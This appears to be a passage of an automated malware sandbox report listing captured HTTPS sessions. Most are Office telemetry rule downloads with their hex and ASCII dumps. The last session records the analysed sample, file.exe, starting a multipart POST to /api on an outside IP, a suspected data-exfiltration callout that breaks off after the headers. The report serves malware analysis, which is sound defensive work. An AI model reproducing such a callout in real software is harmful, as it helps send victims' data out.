                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:26 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                57192.168.2.74976113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:26 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                x-ms-request-id: 5633ff77-c01e-0014-30eb-3aa6a3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095426Z-r1d97b99577n5jhbhC1TEB74vn00000008mg00000000a59d
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:26 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                58192.168.2.74976013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:26 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                x-ms-request-id: 2155a01d-401e-00a3-768c-3a8b09000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095426Z-1777c6cb754mqztshC1TEB4mkc00000009g0000000005mex
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:26 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                59192.168.2.74976213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:26 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                x-ms-request-id: 538c9d0d-101e-0028-1c8c-3a8f64000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095426Z-r1d97b99577tssmjhC1TEB8kan00000008m0000000006hfg
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:26 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                60192.168.2.74976313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:26 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                x-ms-request-id: 8e68b2a4-701e-005c-1a8c-3abb94000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095426Z-1777c6cb7544nvmshC1TEBf7qc000000094g00000000fxz3
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                61192.168.2.74976413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:27 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 485
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                x-ms-request-id: f37cb76d-d01e-0017-2085-3ab035000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095427Z-185f5d8b95crwqd8hC1NYCps680000000a0g00000000c0hn
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:27 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                62192.168.2.74976713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:27 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                x-ms-request-id: 38897a0b-401e-000a-7a8c-3a4a7b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095427Z-1777c6cb7544n7p6hC1TEByvb400000009g000000000bzsb
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:27 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                63192.168.2.74976613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:27 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 470
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                x-ms-request-id: af4852c5-601e-000d-3a8c-3a2618000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095427Z-185f5d8b95csd4bwhC1NYCq7dc00000009w000000000gfp9
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:27 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                64192.168.2.74976513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:27 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 411
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                x-ms-request-id: df8c4adc-701e-0032-17f9-3aa540000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095427Z-r1d97b99577jlrkbhC1TEBq8d000000008hg00000000926u
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:27 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                65192.168.2.74976813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:27 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:27 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 502
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095427Z-185f5d8b95c9mqtvhC1NYCghtc0000000a5g000000005f35
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:27 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                66192.168.2.749769188.114.96.34437724C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:27 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=4AV19PL3PDT4C4Y
